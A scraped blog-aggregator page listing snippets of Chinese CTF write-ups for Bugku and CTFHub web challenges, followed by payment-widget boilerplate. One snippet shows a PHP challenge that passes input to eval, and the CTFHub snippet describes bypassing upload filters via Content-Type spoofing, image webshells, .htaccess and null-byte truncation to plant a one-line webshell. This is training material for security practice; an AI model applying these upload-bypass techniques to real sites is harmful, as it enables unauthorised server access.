m0_73734159的博客
10-12 555
bugku ctf post j解题思路
bugku web题集锦
skysys的研究小屋
06-01 1252
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugku - Web
UP's blog
09-03 2110
刚刚入门CTF,如有错误,望大佬指教
BugKu--------POST
qq_45616570的博客
06-24 2787
BugKu--------POST 题目 解题思路 代码分析 $what=$_POST['what']; //定义一个变量名为what,以post方式提交 echo $what; //输出这个what变量的值 if($what=='flag') //如果这个变量得到值为flag echo 'flag{****}'; //echo 'flag{****}'; 解题方式 使用hackbar进行post方式进行提交 使用burpsuite进行抓包修改 解题过程 使用hackbar解
BugKu-web】inspect-me
weixin_73625393的博客
10-23 162
1.启动场景2.按F12查看源代码,找flag值3.flag为:shellmates{CLA$SI1111C_ch4l1enGE}
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。 它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。 常见的MME类型,例如:   超文本标记语言文本 .html,html text/htm   普通文本 .txt text/plain   RTF文本 .rtf application/rtf   GIF图形 .gif image/gif   JPEG图形 .jpg image/jpeg 上传包含一句话木马的php文件,然后使用burp抓包,修改数据包的content type为image/gif(注意是第二个content type)发送到repeater修改后,点击send,然后放包,即可显示上传php文件成功后的相对路径。使用蚁剑连接该一句话木马即可获得flag。 文件头检查 。 引用: htaccess 查看网页源码,可以看到常用的文件后缀都被禁用。根据题目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】 前提:mod_rewrite模块开启,配置文件中LoadMoudle rewrite_module module modules/mod_rewrite.so AllowOverride All,配置文件中AllowOverride All (如果可能做题过程中结果出现问题,但步骤正确,可以看看前提是否正确) 。 引用:文件头检验 是当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测。如果是白名单允许的,则可以正常上传,否则上传失败。 当我们尝试上传一句话木马的php文件,出现了正确后缀类型的弹窗。使用010editor制作一张图片木马,上传时使用burp抓包把文件后缀改为php,然后点击send。使用蚁剑连接php文件,即可在对应目录下找到flag。 00截断 。 关于ctfhub的全部WP,很抱歉我无法提供相关信息。由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值